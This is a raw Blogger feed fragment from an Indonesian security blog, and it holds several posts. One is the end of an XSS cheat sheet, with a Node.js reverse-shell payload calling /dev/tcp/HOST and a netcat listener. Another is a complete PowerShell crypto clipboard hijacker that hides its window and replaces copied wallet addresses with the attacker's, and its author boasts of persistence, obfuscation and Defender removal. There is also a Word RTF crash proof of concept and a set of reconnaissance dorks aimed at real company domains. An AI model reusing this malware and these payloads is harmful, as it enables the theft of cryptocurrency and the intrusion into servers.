[ -z $1 ]
then
echo -e &quot;Usage:\n$0 FILE\n$0 -r FOLDER&quot;
exit
else
f=$1
fi

sources=(GET POST REQUEST &quot;SERVER\[&#39;PHP&quot; &quot;SERVER\[&#39;PATH_&quot; &quot;SERVER\
[&#39;REQUEST_U&quot;)
sinks=(? echo die print printf print_r var_dump)

xssam(){
for i in ${sources[@]}
do
a=$(grep -in &quot;\$_${i}&quot; $f | grep -o &quot;\$.*=&quot; | sed &quot;s/[ ]\?=//g&quot; | sort -u)
for j in ${sinks[@]}
do
grep --color -in &quot;${j}.*\$_${i}&quot; $f
for k in $a
do
grep --color -in &quot;${j}.*$k&quot; $f
done
done
done
}
if [ $f != &quot;-r&quot; ]
then
xssam
else
for i in $(find $2 -type f -name &quot;*.php&quot;)

do
echo &quot;File: $i&quot;
f=$i
xssam
done
fi&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Node.js RCE&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk eksekusi perintah di aplikasi Node.js yang rentan. Berikan HOST sebagai&lt;/div&gt;&lt;div&gt;nama host, alamat IP, atau domain untuk menerima shell terbalik dari server yang rentan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Javascript:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;require(&#39;child_process&#39;).exec(&#39;bash -c &quot;bash -i &amp;gt;&amp;amp; /dev/tcp/HOST/5855 0&amp;gt;&amp;amp;1&quot;&#39;)&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Listener&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;hacker@inthehouse:~$ nc -lp 5855&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Bagaimana XSS bekerja?&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Serangan XSS biasanya melibatkan penyuntikan kode JavaScript berbahaya ke halaman web. Ini dapat dicapai melalui berbagai cara, seperti bypass validasi input, injeksi atribut, injeksi input formulir, injeksi parameter URL, dan injeksi cookie.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Apa saja jenis XSS yang berbeda?&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Ada tiga jenis utama XSS: XSS tersimpan, XSS tercermin, dan XSS berbasis DOM. XSS Tersimpan terjadi ketika kode berbahaya disuntikkan ke dalam database dan ditampilkan ke pengguna lain. XSS Tercermin terjadi ketika kode berbahaya disuntikkan ke dalam parameter URL dan ditampilkan kepada pengguna. XSS berbasis DOM terjadi ketika kode berbahaya dijalankan dengan memanipulasi Model Objek Dokumen (DOM) halaman web.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Bagaimana saya bisa mencegah serangan XSS?&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Anda dapat mencegah serangan XSS dengan menerapkan berbagai teknik pencegahan, seperti validasi masukan, penyandian keluaran, keamanan cookie, dan menggunakan Kebijakan Keamanan Konten (CSP). Penting untuk memvalidasi input pengguna, menyandikan output, mengamankan cookie Anda, dan menggunakan Kebijakan Keamanan Konten untuk melindungi dari serangan XSS.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Apa saja contoh umum serangan XSS?&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Beberapa contoh umum serangan XSS termasuk mencuri cookie, mengarahkan pengguna ke situs web jahat, mencuri data pengguna, memasang malware, dan melakukan tindakan atas nama pengguna.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Bagaimana saya bisa menguji kerentanan XSS di aplikasi web saya?&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Anda dapat menguji kerentanan XSS di aplikasi web Anda menggunakan berbagai alat dan teknik, seperti pengujian manual, pengujian otomatis, dan pemindai kerentanan. Penting untuk menguji aplikasi web Anda secara teratur untuk kerentanan XSS guna memastikan keamanannya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Apa saja praktik terbaik untuk mencegah serangan XSS?&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Beberapa praktik terbaik untuk mencegah serangan XSS termasuk memvalidasi input pengguna, mengodekan output, menggunakan Kebijakan Keamanan Konten, menerapkan keamanan cookie, dan terus mengikuti praktik terbaik dan pembaruan keamanan. Selain itu, mengedukasi pengguna tentang risiko serangan XSS dan cara melindungi diri sendiri juga dapat membantu mencegah serangan XSS.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Serangan XSS dapat menimbulkan konsekuensi serius bagi aplikasi web dan penggunanya. Namun, dengan mengikuti teknik pencegahan yang diuraikan dalam lembar contekan XSS kami, Anda dapat mengurangi risiko kerentanan XSS secara signifikan. Ingatlah untuk selalu memvalidasi input pengguna, menyandikan output, mengamankan cookie Anda, dan menggunakan Kebijakan Keamanan Konten untuk melindungi dari serangan XSS.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/7957179621327141897'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/7957179621327141897'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/03/mengenal-serangan-xss.html' title='Mengenal Serangan Cross Site Scripting [XSS]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhUknO6HWPTLP6BtQFAnWjXqa-8t4q05fmFfajcD7nPh0ThPz0cKy2MdtCLozihTC0kVZwWAYcVRGQ5eA5Mfi5pcX-GbKDbNRX65HHib5wxo2tDER88rYuPdHYHGBIwSJpxtIzVSkU9xpzL7UEJpGzAo-3lpGodhV3aas6aifXfMzgMdZgGPUnQLN/s72-w640-h336-c/68747470733a2f2f64707376647637347577776f732e636c6f756466726f6e742e6e65742f737461746963732f696d672f6f67696d6167652f63726f73732d736974652d736372697074696e672d7873732e6a7067.jpeg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-4571684260224104744</id><published>2023-03-09T09:35:00.004-08:00</published><updated>2023-04-05T07:39:18.924-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Hijacker"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Crypto clipboard Hijacker</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuYj-fl84Yjpcr_wQsd_JUJKp9spHyDTt4CsyArFVRxgzYATvGR9kh5tx-qPRb8UQJEYOvxDCX4Y_t_L8EccehilP-aaKevAPO8AWKt_Cuun-ojukTC2nCFqxxqS28cqgOpwwvDsRFAKamvf_igNg6yz7uDZTjb1ZrLOvcp078oOtX8MgVubYSm03g/s2000/illustration-of-a-serial-hijacker-with-a-forest-of-trees-with-eyes-in-the-background.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1499&quot; data-original-width=&quot;2000&quot; height=&quot;480&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuYj-fl84Yjpcr_wQsd_JUJKp9spHyDTt4CsyArFVRxgzYATvGR9kh5tx-qPRb8UQJEYOvxDCX4Y_t_L8EccehilP-aaKevAPO8AWKt_Cuun-ojukTC2nCFqxxqS28cqgOpwwvDsRFAKamvf_igNg6yz7uDZTjb1ZrLOvcp078oOtX8MgVubYSm03g/w640-h480/illustration-of-a-serial-hijacker-with-a-forest-of-trees-with-eyes-in-the-background.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;Ini adalah skrip PowerShell untuk pembajak clipboard khusus untuk crypto. (jangan bodoh untuk menjalankan pws ini di sistem utama Anda, gunakan VM)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;hal-hal yang saya tambahkan sebagai berikut&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Fix registry startup&lt;/li&gt;&lt;li&gt;Add hidden attributes&lt;/li&gt;&lt;li&gt;Add drop to temp with random 15 char name&lt;/li&gt;&lt;li&gt;Add obfuscation&lt;/li&gt;&lt;li&gt;Add delete windows 10 defender&lt;/li&gt;&lt;li&gt;Add to be able to set the execution policy as unrestricted upon running the clipper&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;
&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;Add-Type -Name Window -Namespace Console -MemberDefinition &#39;

[DllImport(&quot;Kernel32.dll&quot;)]

public static extern IntPtr GetConsoleWindow();

[DllImport(&quot;user32.dll&quot;)]

public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

public static void Hide()

{

    IntPtr hWnd = GetConsoleWindow();

    if(hWnd != IntPtr.Zero)

    {

        ShowWindow(hWnd, 0);

    }

}

&#39;

[Console.Window]::Hide()

$addy = @{

    &quot;BTC&quot; = &quot;Your btc addy&quot;

    &quot;ETH&quot; = &quot;Your eth addy&quot;

    &quot;LTC&quot; = &quot;Your ltc addy&quot;

    &quot;TRX&quot; = &quot;Your trx addy&quot;

    &quot;XMR&quot; = &quot;Your xmr addy&quot;

}

while ($true) {

    $clipper = Get-Clipboard

    if ($clipper -match &quot;^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$&quot;) {

        $clipper = $addy[&quot;BTC&quot;]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match &quot;^0x[a-fA-F0-9]{40}$&quot;) {

        $clipper = $addy[&quot;ETH&quot;]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match &quot;^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$&quot;) {

        $clipper = $addy[&quot;LTC&quot;]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match &quot;^T[a-zA-HJ-NP-Z0-9]{33}$&quot;) {

        $clipper = $addy[&quot;TRX&quot;]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match &quot;^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$&quot;) {

        $clipper = $addy[&quot;XMR&quot;]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

    Start-Sleep -Seconds 1

}
&lt;/pre&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/4571684260224104744'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/4571684260224104744'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/03/crypto-clipboard-hijacker.html' title='Crypto clipboard Hijacker'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuYj-fl84Yjpcr_wQsd_JUJKp9spHyDTt4CsyArFVRxgzYATvGR9kh5tx-qPRb8UQJEYOvxDCX4Y_t_L8EccehilP-aaKevAPO8AWKt_Cuun-ojukTC2nCFqxxqS28cqgOpwwvDsRFAKamvf_igNg6yz7uDZTjb1ZrLOvcp078oOtX8MgVubYSm03g/s72-w640-h480-c/illustration-of-a-serial-hijacker-with-a-forest-of-trees-with-eyes-in-the-background.webp" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-3251376891891786094</id><published>2023-03-06T10:46:00.003-08:00</published><updated>2023-04-05T07:39:04.245-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'> CVE-2023-21716 (Microsoft Word RCE) Python PoC</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgdhDenDRaXpSzoiLHNsmoEVlisp9f9r2iBqeDxnbl9-anjI7ej5SnOIVREyduYTxlm7kEbjdDyZtsnPxD4Mg-Fzkn30Q-y23JuPLosehhIRtv6s2ZVPpXuo6ut462Qgxgq1X4jtYmNhQA2Rg3GZiFPsrnT19qntwBbyCPmnIsDOqYjpk2ohV9N2rW/s1920/tadas-sar-T01GZhBSyMQ-unsplash.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1440&quot; data-original-width=&quot;1920&quot; height=&quot;480&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgdhDenDRaXpSzoiLHNsmoEVlisp9f9r2iBqeDxnbl9-anjI7ej5SnOIVREyduYTxlm7kEbjdDyZtsnPxD4Mg-Fzkn30Q-y23JuPLosehhIRtv6s2ZVPpXuo6ut462Qgxgq1X4jtYmNhQA2Rg3GZiFPsrnT19qntwBbyCPmnIsDOqYjpk2ohV9N2rW/w640-h480/tadas-sar-T01GZhBSyMQ-unsplash.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;CNA:  Microsoft Corporation (more like telemetry corporation)[/align]
[align=center]Base Score:  9.8 CRITICAL [/align]
[align=center]Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
&lt;/pre&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Ini adalah kerentanan korupsi tumpukan di parser RTF Microsoft Word yang, jika dipicu, memungkinkan penyerang mencapai eksekusi kode jarak jauh dengan hak istimewa korban. Cacat ini tidak memerlukan autentikasi sebelumnya: penyerang cukup mengirim file RTF yang berisi jebakan ke korban melalui email.&lt;/p&gt;&lt;p&gt;“Microsoft Office 2010 dan yang lebih baru menggunakan Tampilan Terproteksi untuk membatasi kerusakan yang disebabkan oleh dokumen berbahaya yang diperoleh dari sumber yang tidak tepercaya. Tampilan Terproteksi berlaku saat kerentanan ini muncul dan dengan demikian kerentanan keluar kotak pasir tambahan akan diperlukan untuk mendapatkan hak istimewa penuh&lt;/p&gt;
&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;open(&quot;t3zt.rtf&quot;,&quot;wb&quot;).write((&quot;{\\rtf1{\n{\\fonttbl&quot; + &quot;&quot;.join([ (&quot;{\\f%dA;}\n&quot; % i) for i in range(0,32761) ]) + &quot;}\n{\\rtlch no crash??}\n}}\n&quot;).encode(&#39;utf-8&#39;))
&lt;/pre&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/3251376891891786094'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/3251376891891786094'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/03/cve-2023-21716-microsoft-word-rce.html' title=' CVE-2023-21716 (Microsoft Word RCE) Python PoC'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgdhDenDRaXpSzoiLHNsmoEVlisp9f9r2iBqeDxnbl9-anjI7ej5SnOIVREyduYTxlm7kEbjdDyZtsnPxD4Mg-Fzkn30Q-y23JuPLosehhIRtv6s2ZVPpXuo6ut462Qgxgq1X4jtYmNhQA2Rg3GZiFPsrnT19qntwBbyCPmnIsDOqYjpk2ohV9N2rW/s72-w640-h480-c/tadas-sar-T01GZhBSyMQ-unsplash.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-3077569690190483627</id><published>2023-02-19T19:02:00.003-08:00</published><updated>2023-04-18T20:55:36.638-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Dorks"/><title type='text'>Google Dorks Yang Harus Diketahui </title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_W0ePuHBSrXieAPxsK4O6fKTwk24S2xLbYl-awVNTMrJKLPrBvIAj5EkVZD63gRgJQhAFwX5gfi5wLeJ0ORlX9QHCl5R9nVMZs26_Gqlfwq-L8t60Cq8W9G42uzlhqDj1x1S-W9E1RpDaDRyaZhbXQ9u0-l_vcH2mwQqgjiGoPHZQqvzp3IEvI15/s740/823052020.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;458&quot; data-original-width=&quot;740&quot; height=&quot;396&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_W0ePuHBSrXieAPxsK4O6fKTwk24S2xLbYl-awVNTMrJKLPrBvIAj5EkVZD63gRgJQhAFwX5gfi5wLeJ0ORlX9QHCl5R9nVMZs26_Gqlfwq-L8t60Cq8W9G42uzlhqDj1x1S-W9E1RpDaDRyaZhbXQ9u0-l_vcH2mwQqgjiGoPHZQqvzp3IEvI15/w640-h396/823052020.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Google dorks adalah istilah penelusuran khusus yang dapat membantu Anda menemukan informasi sensitif&amp;nbsp;seperti nama pengguna, kata sandi, nomor kartu kredit, alamat email, skrip shell, akun pengguna, dan sebagainya.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sebenarnya&amp;nbsp;Dorks ini tidak terbatas pada Google. Kita juga dapat menggunakannya dengan mesin pencari seperti Bing dan Yahoo. Hasilnya mungkin berbeda-beda, tetapi tetap melayani tujuan yang sama.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Untuk memanfaatkan potensi penuh dari Google Dorking, kita perlu menguasai beberapa operator pencarian khusus. Operator ini akan menyempurnakan hasil pencarian dan membantu menemukan dengan tepat apa yang kita cari.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Mari kita coba beberapa Google dorks.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Google dork Favorit Saya&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Mulailah dengan “situs:&amp;lt;domain&amp;gt;”. Kemudian, kecualikan halaman membosankan dengan &quot;-www&quot; atau istilah lain sampai Anda menemukan hal menarik:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;site:tesla.com -www -shop -share -ir -mfa&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSySHjaAfWseyTRVK5IcmYSB4rxdmAr-lhrQjZ7XrJqtmnmm6OTQQykpDJkXa14U-gpibdUc6PzCsPU6FLIfyj6jGLNGkM6u35VUWdCC06QXF_lEymCvEtvuvBRBaZw5170V0LsXvq8eEXvNxTL6PY30N8yFa_YpRQCT0xYVQd7luc9N8LpKzhv1-/s720/1_7zdnbEmvHWAisbp1gGSuRg.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;211&quot; data-original-width=&quot;720&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSySHjaAfWseyTRVK5IcmYSB4rxdmAr-lhrQjZ7XrJqtmnmm6OTQQykpDJkXa14U-gpibdUc6PzCsPU6FLIfyj6jGLNGkM6u35VUWdCC06QXF_lEymCvEtvuvBRBaZw5170V0LsXvq8eEXvNxTL6PY30N8yFa_YpRQCT0xYVQd7luc9N8LpKzhv1-/w640-h188/1_7zdnbEmvHWAisbp1gGSuRg.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Kebocoran Pastebin&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Lihat situs-situs seperti pastebin, jsfiddle, dan codebeautify untuk kode yang tersisa dari pengembang:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;site:pastebin.com&lt;/p&gt;&lt;p&gt;site:jsfiddle.net&lt;/p&gt;&lt;p&gt;site:codebeautify.org&lt;/p&gt;&lt;p&gt;site:codepen.io &quot;tesla.com&quot;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBnKIhunxVw8vMJz6nDlU3-3mQtIxgulcViYEioZl5GQyiGfphqEySND-S3rkcKm0JMh1ZZ__LZwD4qHfc5s-8PZP4wZ_gq26FcKHPQBgY95oKQ5Nvd1RfdjZdjLJOnyUvZNTmRgiFj33nNRZPSnTc2Nb4mlgf-yWyMpLPVsVcpfK0pXQRIUC5scTF/s920/2.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;296&quot; data-original-width=&quot;920&quot; height=&quot;206&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBnKIhunxVw8vMJz6nDlU3-3mQtIxgulcViYEioZl5GQyiGfphqEySND-S3rkcKm0JMh1ZZ__LZwD4qHfc5s-8PZP4wZ_gq26FcKHPQBgY95oKQ5Nvd1RfdjZdjLJOnyUvZNTmRgiFj33nNRZPSnTc2Nb4mlgf-yWyMpLPVsVcpfK0pXQRIUC5scTF/w640-h206/2.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Ekstensi PHP dengan parameter&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Gunakan &quot;ext:php&quot; dan &quot;inurl:?&quot; bersama dengan domain untuk menemukan file .php dengan tanda tanya di url:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;site:tesla.com ext:php inurl:?&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kg2coqkaGtK1ejK9aL33daB5Yl6Yblkz0PFOLfSo6_xBtntuB465dRPCBlPwxeCwhOuxzpzcZ2Jy_hFBXP4drp4rUeMhDb6rU0ov6msXZPljKVAsGiPn-S8pYSdgMuEeC-5zHTH3vzhWNWxyNvqqsvwdsOaPt6A3aohPfvwitQs0UY4Y7zMPpAXv/s720/3.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;186&quot; data-original-width=&quot;720&quot; height=&quot;166&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kg2coqkaGtK1ejK9aL33daB5Yl6Yblkz0PFOLfSo6_xBtntuB465dRPCBlPwxeCwhOuxzpzcZ2Jy_hFBXP4drp4rUeMhDb6rU0ov6msXZPljKVAsGiPn-S8pYSdgMuEeC-5zHTH3vzhWNWxyNvqqsvwdsOaPt6A3aohPfvwitQs0UY4Y7zMPpAXv/w640-h166/3.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Mengungkapkan XSS dan Membuka Redirect Bug Bounty&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Lihat bounty bug yang diperbaiki dan tidak diperbaiki yang diungkapkan secara publik melalui OpenBugBounty:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;site:openbugbounty.org inurl:reports intext:&quot;yahoo.com&quot;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJm2jg_C-tX1d3TFrEKDH-2tt5Hsho2X5NWGEUdWBD87WrPjN9rraw_8KWZutSS3r6tiqNUyLyGEH7jEPggNCV8WrCwN9CuDIpWtejt1q3cSw_iDjnJPXPtlqvf-imEGytNYnfSzAUiHwO4vqNWpvYQPHqMesV9gJ-jZXEXkVbNRwqs_Okofu-SWt/s720/4.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;199&quot; data-original-width=&quot;720&quot; height=&quot;176&quot; 